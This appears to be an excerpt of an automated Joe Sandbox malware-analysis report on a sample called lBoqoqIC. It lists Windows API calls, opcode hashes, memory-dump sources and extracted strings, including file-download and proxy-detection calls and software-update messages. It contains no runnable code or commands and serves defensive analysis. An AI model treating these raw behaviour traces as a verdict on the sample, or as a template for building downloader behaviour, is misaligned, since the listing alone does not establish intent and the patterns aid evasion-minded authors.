                                                                                                                • Opcode ID: af8a836f103095f5520ba7c76bf8a22c7b7e0aa0141647d93c78ec2dea393e0f
                                                                                                                • Instruction ID: d0286936fcaba64e54834185cd9a20b4573692e839711ef3cef73dca8a9ecd11
                                                                                                                • Opcode Fuzzy Hash: af8a836f103095f5520ba7c76bf8a22c7b7e0aa0141647d93c78ec2dea393e0f
                                                                                                                • Instruction Fuzzy Hash: 50D05E32660B114BDB288A29E8067AB36D89B09724F151B3D540AD2680C67CE8448A5C
                                                                                                                APIs
                                                                                                                • GetFileAttributesA.KERNEL32(00000000,?,0047A8BB,?,?,0000005C,?,00000000,?,00000000,00000000), ref: 0047A96A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188754299-0
                                                                                                                • Opcode ID: ab5ff64a462ac66abf9c4a61fbd51062fa0a121fbff6943fbf81d1aaed59d95f
                                                                                                                • Instruction ID: 28e8287bf807d229f0b926238d0ac886160e5cd003f2e80f0da5201b7632a473
                                                                                                                • Opcode Fuzzy Hash: ab5ff64a462ac66abf9c4a61fbd51062fa0a121fbff6943fbf81d1aaed59d95f
                                                                                                                • Instruction Fuzzy Hash: 39D0A7B110013052C1102628DC48ACF6E04DB907B4F018A2AF619C41F5C3214CA3C699
                                                                                                                APIs
                                                                                                                • LoadStringA.USER32(?,?,?,?), ref: 004C9C9E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LoadString
                                                                                                                • String ID:
                                                                                                                • API String ID: 2948472770-0
                                                                                                                • Opcode ID: 0c0e5a301bfefe032e674e7a95a1f583e608efff8566e35ab39e29ea695d7c11
                                                                                                                • Instruction ID: 4406e836ed60d0a265fc58f86d2ca5a4f19eb9a8ee7eb16a50e4321254071119
                                                                                                                • Opcode Fuzzy Hash: 0c0e5a301bfefe032e674e7a95a1f583e608efff8566e35ab39e29ea695d7c11
                                                                                                                • Instruction Fuzzy Hash: B3D0A7B64083A1ABCB01DF509808D4FBBE4BF65310F058C1EF49043211C324C804C766
                                                                                                                APIs
                                                                                                                • SetWindowTextA.USER32(00000000,00000001), ref: 004C9484
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: TextWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 530164218-0
                                                                                                                • Opcode ID: f299fbd2b692dafc00fbe8019f5bb0e35016e118652fc04b6151752bd13f98d6
                                                                                                                • Instruction ID: 322247e5cdf665128a38e50abd2c0086af5b3721df4c6fbb8fe1f035fb40e42c
                                                                                                                • Opcode Fuzzy Hash: f299fbd2b692dafc00fbe8019f5bb0e35016e118652fc04b6151752bd13f98d6
                                                                                                                • Instruction Fuzzy Hash: B1D09E34204100AFCF499F60D948E167BA1FF94705F21897DE046CA525D735CC53EB09
                                                                                                                APIs
                                                                                                                • ShowWindow.USER32(?,?,004CA545,00000000,0000E146,00000000,?,?,0040A373), ref: 004C95A0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ShowWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1268545403-0
                                                                                                                • Opcode ID: 7bfa3681f46127cd04076910ce2e6fe2432e97ec53505bfe2142a80de136bdac
                                                                                                                • Instruction ID: dfe27634e7d182de6a9ca053cd276e1a2950ad64effb85482d5a9f8fee7fd842
                                                                                                                • Opcode Fuzzy Hash: 7bfa3681f46127cd04076910ce2e6fe2432e97ec53505bfe2142a80de136bdac
                                                                                                                • Instruction Fuzzy Hash: 23D09E35304200FFCB458F60D948E167BA1BF94705F2045B9F1458A165D736CC12EB45
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(0000001C,00000318,00000000,00000000,0049DCC4,?), ref: 0049AF19
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Value
                                                                                                                • String ID:
                                                                                                                • API String ID: 3702945584-0
                                                                                                                • Opcode ID: 7c48532714199b99f88cb2d6722789347f906474db233065fa66e4fd602f10d7
                                                                                                                • Instruction ID: 7bbf17f8638fa34963296a8da90bb3ca29cc3c8c013688301d4745ba2267ddc5
                                                                                                                • Opcode Fuzzy Hash: 7c48532714199b99f88cb2d6722789347f906474db233065fa66e4fd602f10d7
                                                                                                                • Instruction Fuzzy Hash: 0F4162F1A01B009BEA20DF769841997FBE5FB90314F144C3FE56E87302EB35A8058B96
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 3472027048-0
                                                                                                                • Opcode ID: 427134f21cdecd7a157666b998ac20670996af605c20c15835f389f0d615bae8
                                                                                                                • Instruction ID: e8b172bd776e517c80a1537b670a1ab67c6d30d51809ca01058fddb25c9e2994
                                                                                                                • Opcode Fuzzy Hash: 427134f21cdecd7a157666b998ac20670996af605c20c15835f389f0d615bae8
                                                                                                                • Instruction Fuzzy Hash: 734147B1A0520ACFEB10CF58C685AEEBBB0FF54354F14816AED41A7391D734AA91CB94
                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(000000C8,00000001,00000000,00000000,?,00000000,?,10003493,?,00000000,10005FD3,?,?,10003493,?,00000000), ref: 100051F3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 3472027048-0
                                                                                                                • Opcode ID: a944703de658dfee16fd52c57443025f366aa61193535bc0aaea3e0d96b4f2c7
                                                                                                                • Instruction ID: c47b54039767993dcd9211b2d7996eb4c282f8e27b28bb2914e46aa7ad9f0d55
                                                                                                                • Opcode Fuzzy Hash: a944703de658dfee16fd52c57443025f366aa61193535bc0aaea3e0d96b4f2c7
                                                                                                                • Instruction Fuzzy Hash: 37F0A93610010CBAEF029F89AC41EDFBB69FF9D2A0F018156FE445602186739822ABB1
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0041C476
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                • GetTempPathA.KERNEL32(00000104,?), ref: 0041C52F
                                                                                                                • GetTempFileNameA.KERNEL32(?,IRWIN,00000000,?), ref: 0041C549
                                                                                                                • SetFileAttributesA.KERNEL32(?,00000080), ref: 0041C55B
                                                                                                                • DeleteFileA.KERNEL32(?), ref: 0041C568
                                                                                                                • LoadLibraryA.KERNEL32(wininet.dll), ref: 0041C62B
                                                                                                                • GetProcAddress.KERNEL32(00000000,InternetQueryOptionA), ref: 0041C63E
                                                                                                                • GetProcAddress.KERNEL32(?,DetectAutoProxyUrl), ref: 0041C69E
                                                                                                                • GlobalFree.KERNEL32(?), ref: 0041C6C9
                                                                                                                • GlobalFree.KERNEL32(?), ref: 0041C6D7
                                                                                                                • GlobalFree.KERNEL32(?), ref: 0041C6E5
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0041C6EE
                                                                                                                • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0041C70E
                                                                                                                • LoadLibraryA.KERNEL32(jsproxy.dll), ref: 0041C720
                                                                                                                • GetProcAddress.KERNEL32(00000000,InternetInitializeAutoProxyDll), ref: 0041C733
                                                                                                                • GetProcAddress.KERNEL32(?,InternetGetProxyInfo), ref: 0041C7F3
                                                                                                                • GetProcAddress.KERNEL32(?,InternetDeInitializeAutoProxyDll), ref: 0041C851
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0041C88C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressFreeProc$FileLibrary$Global$LoadTemp$AttributesDeleteDownloadH_prologIncrementInterlockedNamePathlstrlen
                                                                                                                • String ID: %s; DIRECT$0:R$DetectAutoProxyUrl$IRWIN$InternetDeInitializeAutoProxyDll$InternetGetProxyInfo$InternetInitializeAutoProxyDll$InternetQueryOptionA$jsproxy.dll$wininet.dll
                                                                                                                • API String ID: 989166556-3321067483
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(CTL3D32.DLL,004D32FB,?,00000000,00479292,00523A30), ref: 004D4198
                                                                                                                • GetProcAddress.KERNEL32(00000000,0000000C), ref: 004D41AF
                                                                                                                • GetProcAddress.KERNEL32(?,0000000D), ref: 004D41B9
                                                                                                                • GetProcAddress.KERNEL32(?,00000010), ref: 004D41C3
                                                                                                                • GetProcAddress.KERNEL32(?,00000018), ref: 004D41CD
                                                                                                                • GetProcAddress.KERNEL32(?,00000006), ref: 004D41D7
                                                                                                                • GetProcAddress.KERNEL32(?,00000015), ref: 004D41E1
                                                                                                                • GetProcAddress.KERNEL32(?,00000016), ref: 004D41EB
                                                                                                                • GetProcAddress.KERNEL32(?,00000003), ref: 004D41F5
                                                                                                                • GetProcAddress.KERNEL32(?,00000019), ref: 004D41FF
                                                                                                                • FreeLibrary.KERNEL32(?,?,00000000,00479292,00523A30), ref: 004D4250
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                                                • String ID: CTL3D32.DLL
                                                                                                                • API String ID: 2449869053-1520792465
                                                                                                                APIs
                                                                                                                • CoCreateInstance.COMBASE(004F0940,00000000,00000001,004F0950,?), ref: 00414B2B
                                                                                                                • lstrcpy.KERNEL32(?,?), ref: 00414B48
                                                                                                                • lstrlen.KERNEL32(?,?,00000104), ref: 00414BF5
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000), ref: 00414C05
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharCreateInstanceMultiWidelstrcpylstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3671088469-0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004C93E0: GetWindowLongA.USER32(?,000000F0), ref: 004C93EC
                                                                                                                • GetKeyState.USER32(00000010), ref: 004C8768
                                                                                                                • GetKeyState.USER32(00000011), ref: 004C8771
                                                                                                                • GetKeyState.USER32(00000012), ref: 004C877A
                                                                                                                • SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 004C8790
                                                                                                                Similarity
                                                                                                                • API ID: State$LongMessageSendWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1063413437-0
                                                                                                                APIs
                                                                                                                • FindFirstFileA.KERNEL32(?,?,?), ref: 004A04B1
                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004A04C8
                                                                                                                • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 004A04DD
                                                                                                                • FindClose.KERNEL32(00000000), ref: 004A04E4
                                                                                                                Similarity
                                                                                                                • API ID: FileTime$Find$CloseDateFirstLocal
                                                                                                                • String ID:
                                                                                                                • API String ID: 2659516521-0
                                                                                                                APIs
                                                                                                                • FindResourceA.KERNEL32(?,?,000000F0), ref: 004A895B
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 004A8967
                                                                                                                • LockResource.KERNEL32(00000000), ref: 004A8972
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindLoadLock
                                                                                                                • String ID:
                                                                                                                • API String ID: 2752051264-0
                                                                                                                APIs
                                                                                                                • IsIconic.USER32(?), ref: 004746B2
                                                                                                                  • Part of subcall function 004C9592: ShowWindow.USER32(?,?,004CA545,00000000,0000E146,00000000,?,?,0040A373), ref: 004C95A0
                                                                                                                • Sleep.KERNEL32(00000064,00000009), ref: 004746C7
                                                                                                                Similarity
                                                                                                                • API ID: IconicShowSleepWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2011448064-0
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004703D2
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 004C6286: lstrlen.KERNEL32(00000001,?,?,0040264F,?,00000000,00000000,?,00000000,00000000,?,?,00000000,?,?,00402920), ref: 004C6297
                                                                                                                  • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                                                  • Part of subcall function 00471F70: __EH_prolog.LIBCMT ref: 00471F75
                                                                                                                • MessageBoxA.USER32(00000000,00000000,?,MSG_UPDATE_ABORT_NEEDED), ref: 00470736
                                                                                                                • MessageBoxA.USER32(00000000,00000000,?,MSG_UPDATE_RESTART_NEEDED), ref: 00470819
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 0046F95E: __EH_prolog.LIBCMT ref: 0046F963
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$IncrementInterlockedMessagelstrlen
                                                                                                                • String ID: "%s:%s" "%s:%s" %s %s$"%s:%s" %s %s$.dat$.ts3$/DATFILE$/TUCPS$/TURC$0:R$Automatic update required.$Dat file updated: '%s'$MSG_UPDATE_ABORT_NEEDED$MSG_UPDATE_ABORT_TITLE$MSG_UPDATE_RESTART_NEEDED$MSG_UPDATE_RESTART_TITLE$Restarting update executable: '%s'$The source folder is not writable following rules.$The update has been aborted.
                                                                                                                • API String ID: 684416522-2187568835
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(0000001C,00000000,00000520), ref: 004A07DE
                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004A0807
                                                                                                                  • Part of subcall function 004A1F10: TlsGetValue.KERNEL32(0000001C,?,00000000,?,00000000,004A0AEA,00000065,00000000,00000104), ref: 004A1F1A
                                                                                                                  • Part of subcall function 004A1F10: lstrcpy.KERNEL32(00000000,00523A30), ref: 004A1F3E
                                                                                                                • lstrcpyn.KERNEL32(?,00000000,?,00000104), ref: 004A0824
                                                                                                                • lstrcat.KERNEL32(?,00510870), ref: 004A0845
                                                                                                                • lstrcat.KERNEL32(?,?), ref: 004A0854
                                                                                                                • wsprintfA.USER32 ref: 004A088A
                                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000), ref: 004A08A9
                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000), ref: 004A08C3
                                                                                                                • lstrlen.KERNEL32(?,?,00000000), ref: 004A08DB
                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000), ref: 004A08EA
                                                                                                                • wsprintfA.USER32 ref: 004A0909
                                                                                                                • lstrlen.KERNEL32(?,?,00000000), ref: 004A091A
                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000), ref: 004A0923
                                                                                                                • WriteFile.KERNEL32(00000000,00511394,00000002,?,00000000), ref: 004A0934
                                                                                                                • wsprintfA.USER32 ref: 004A0958
                                                                                                                • lstrlen.KERNEL32(?,?,00000000), ref: 004A0969
                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000), ref: 004A0972
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004A0975
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Write$lstrlenwsprintf$Valuelstrcat$CloseCreateDirectoryHandlePointerWindowslstrcpylstrcpyn
                                                                                                                • String ID: %s %d %s $%s %lx
                                                                                                                • API String ID: 1992647425-4210052431
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004083DD
                                                                                                                • GetSysColor.USER32(00000014), ref: 00408407
                                                                                                                • GetSysColor.USER32(00000010), ref: 0040840C
                                                                                                                • GetSysColor.USER32(00000010), ref: 00408421
                                                                                                                • FrameRect.USER32(?,?,?), ref: 00408444
                                                                                                                • GetSysColor.USER32(00000014), ref: 00408464
                                                                                                                • GetSysColor.USER32(00000016), ref: 0040847A
                                                                                                                • GetSysColor.USER32(00000010), ref: 0040848D
                                                                                                                • GetSysColor.USER32(00000015), ref: 004084A0
                                                                                                                • GetSysColor.USER32(00000010), ref: 004084CA
                                                                                                                • GetSysColor.USER32(00000014), ref: 004084CF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$FrameH_prologRect
                                                                                                                • String ID: 8pN
                                                                                                                • API String ID: 3885730630-1801615451
                                                                                                                APIs
                                                                                                                • IsWindow.USER32(?), ref: 00460894
                                                                                                                • GetFocus.USER32 ref: 0046089E
                                                                                                                • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 004608D2
                                                                                                                • IsWindow.USER32(?), ref: 0046090F
                                                                                                                • IsWindowVisible.USER32(?), ref: 00460918
                                                                                                                • IsWindowEnabled.USER32(?), ref: 00460921
                                                                                                                • IsWindow.USER32(?), ref: 00460953
                                                                                                                • IsWindowVisible.USER32(?), ref: 0046095C
                                                                                                                • IsWindowEnabled.USER32(?), ref: 00460965
                                                                                                                • IsWindow.USER32(?), ref: 0046098C
                                                                                                                • IsWindowVisible.USER32(?), ref: 00460995
                                                                                                                • IsWindowEnabled.USER32(?), ref: 0046099E
                                                                                                                • IsWindow.USER32(?), ref: 004609C5
                                                                                                                • IsWindowVisible.USER32(?), ref: 004609CE
                                                                                                                • IsWindowEnabled.USER32(?), ref: 004609D7
                                                                                                                • SendMessageA.USER32(?,000000F4,00000001,00000001), ref: 004609ED
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$EnabledVisible$MessageSend$Focus
                                                                                                                • String ID:
                                                                                                                • API String ID: 2045024204-0
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00428809
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                • __ftol.LIBCMT ref: 004288F1
                                                                                                                • __ftol.LIBCMT ref: 00428A07
